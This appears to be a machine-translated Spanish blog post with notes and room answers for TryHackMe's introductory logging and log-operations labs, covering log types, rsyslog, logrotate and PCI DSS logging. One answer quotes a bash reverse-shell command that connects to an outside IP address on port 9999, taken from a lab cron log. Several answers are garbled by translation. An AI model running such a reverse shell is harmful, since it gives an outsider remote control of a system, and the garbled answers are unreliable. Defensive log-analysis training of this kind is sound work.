Cubrimos una introducción al registro donde analizamos la lógica de la creación de registros y por qué los creamos. Los registros se crean y generan para realizar un seguimiento del rendimiento, analizar incidentes de seguridad y establecer un patrón a partir del cual se puedan predecir eventos futuros. Los registros pueden ser registros del sistema, registros de aplicaciones, registros de seguridad, registros de auditoría, registros del servidor y registros de bases de datos. El proceso de gestión de registros comienza con la recopilación de registros, su almacenamiento en una ubicación central, su análisis y luego el análisis utilizando herramientas de análisis de registros y también SIEM. Esto fue parte de TryHackMe Introducción a los registros tutorial que forma parte de TryHackMe SOC Nivel 2 Track.

Esta publicación también cubre las respuestas para Operaciones de registro de TryHackMe Habitación.

Notas de estudio de OSCP

El curso completo y práctico de pruebas de penetración de aplicaciones web

Reflejos

Los archivos de registro son registros de eventos confirmados en un archivo en formato de lista. Pueden incluir todo tipo de información sobre eventos que sucedieron en un momento determinado. Cada dispositivo en la red crea archivos de registro, brindándole así un historial de lo que ha estado sucediendo.
Los registros suelen contener cinco áreas encabezadas. Ellos son:

  • Marca de tiempo: la hora del evento. 
  • Nivel de registro: qué tan grave o importante es el evento.
  • Nombre de usuario: quién provocó el evento.
  • Servicio o aplicación: qué causó el evento.
  • Descripción del evento: qué ha sucedido.

Tipos de archivos de registro

  • Registro de eventos –Registra información sobre el uso del tráfico de red y rastrea los intentos de inicio de sesión, eventos de aplicaciones e intentos fallidos de contraseña.
  • Registro del sistema (o syslog): registra eventos del sistema operativo, incluidos mensajes de inicio, cambios del sistema, apagados y errores y advertencias.
  • Registro del servidor – contiene un registro de actividades en un documento de texto relacionado con un servidor específico durante un período de tiempo específico.
  • Registro de cambios – enumera los cambios realizados en una aplicación o archivo.
  • Registro de disponibilidad –sigue el tiempo de actividad, la disponibilidad y el rendimiento del sistema.
  • Registro de autorización y acceso – enumera quién accede a aplicaciones o archivos.
  • Registro de recursos: proporciona información sobre problemas de conectividad y cualquier problema de capacidad.
  • Registros de aplicaciones Mensajes sobre aplicaciones específicas, incluidos estados, errores, advertencias, etc.
  • Registros de auditoría Actividades relacionadas con procedimientos operativos cruciales para el cumplimiento normativo.
  • Registros de seguridad Eventos de seguridad como inicios de sesión, cambios de permisos, actividad del firewall, etc.
  • Registros de red Tráfico de red, conexiones y otros eventos relacionados con la red.
  • Registros de base de datos Actividades dentro de un sistema de base de datos, como consultas y actualizaciones.
  • Registros del servidor web Solicitudes procesadas por un servidor web, incluidas URL, códigos de respuesta, etc.

Respuestas de la habitación | TryHackMe Introducción a los registros

¿Cómo se llama tu colega que dejó una nota en tu escritorio?

Sidra de pera

¿Cuál es la ruta completa al archivo de registro sugerido para la investigación inicial?

T1566/var/log/gitlab/nginx/access.logT1566

Según la lista de tipos de registro en esta tarea, ¿qué tipo de registro utiliza el archivo de registro especificado en la nota de la Tarea 2?

registro del servidor web

Según la lista de formatos de registro de esta tarea, ¿qué formato de registro utiliza el archivo de registro especificado en la nota de la Tarea 2?

conjunto

Después de configurar rsyslog para sshd, ¿qué nombre de usuario aparece repetidamente en los registros de sshd en /var/log/websrv-02/rsyslog_sshd.log, indicando intentos fallidos de inicio de sesión o fuerza bruta?

estansimon

¿Cuál es la dirección IP de SIEM-02 según el archivo de configuración rsyslog /etc/rsyslog.d/99-websrv-02-cron.conf, que se utiliza para monitorear los mensajes cron?

10.10.10.101

Según los registros generados en /var/log/websrv-02/rsyslog_cron.log, ¿qué comando ejecuta el usuario root?

/bin/bash -c “/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1”

Según la configuración de logrotate /etc/logrotate.d/99-websrv-02_cron.conf, ¿cuántas versiones de copias antiguas de archivos de registro comprimidos se conservarán?

24

Según la configuración de logrotate /etc/logrotate.d/99-websrv-02_cron.conf, ¿cuál es la frecuencia de rotación de registros?

cada hora

Al acceder a la URL del visor de registros para archivos de registro sin procesar sin analizar, ¿qué error muestra “/var/log/websrv-02/rsyslog_cron.log” al seleccionar los diferentes filtros?

sin campo de fecha

¿Cuál es el proceso de estandarizar los datos analizados en un formato más fácil de leer y consultar?

Normalización

¿Cuál es el proceso de consolidación de registros normalizados para mejorar el análisis de actividades relacionadas con una dirección IP específica?

Enriquecimiento

Respuestas de la habitación | Operaciones de registro de TryHackMe

¿Cuál de los propósitos de registro dados sería adecuado para medir el costo de utilizar un servicio?

Operacional

¿Cuál de los propósitos de registro dados sería adecuado para investigar los registros de aplicaciones para mejorar y estabilizar? 

Depurar

Eres un consultor que trabaja para una startup en crecimiento. Como consultor, participó en una sesión de planificación de configuración de registros. La empresa para la que trabaja está trabajando para cumplir con el procesamiento de la información de pago. Se está discutiendo el conjunto de preguntas dado.

¿Qué respuesta a la pregunta puede ser “tanto como se menciona en los requisitos de PCI DSS”?

¿Cuánto necesitas para iniciar sesión?

La sesión continúa y tus compañeros de equipo necesitan tu ayuda; negociarán el presupuesto de registro y los detalles de operación. Como consultor, debes recordarles un punto vital:

¿Qué requisitos son innegociables?

requisitos operativos y de seguridad

Su equipo está trabajando en políticas para decidir qué registros se almacenarán y qué parte estará disponible para su análisis.
¿Cuál de los principios de registro dados se implementaría y mejoraría?

Archivado y Accesibilidad

Su equipo implementó un nuevo producto de registro API. A uno de los miembros del equipo se le ha encomendado la tarea de recopilar los registros generados por ese nuevo producto. El miembro del equipo informó errores continuos al transferir los registros a la plataforma de revisión.
En este caso, ¿cuál de las dificultades dadas ocurre?

Proceso y Archivo

Como consultor, usted está realizando una evaluación de riesgos integral y notó que uno de los equipos de desarrollo implementó un script personalizado para generar registros para un sistema antiguo, que omite los registros en algunas fases.

¿Cómo llamarías a esto? (¿Error o práctica?)

Error

Tutorial en vídeo

, ,
Mostrar Comentarios

Motasem

Acerca del Autor

Creo notas de ciberseguridad, notas de marketing digital y cursos online. También brindo consultoría de marketing digital que incluye, entre otros, SEO, Google y meta anuncios y administración de CRM.

Ver Artículos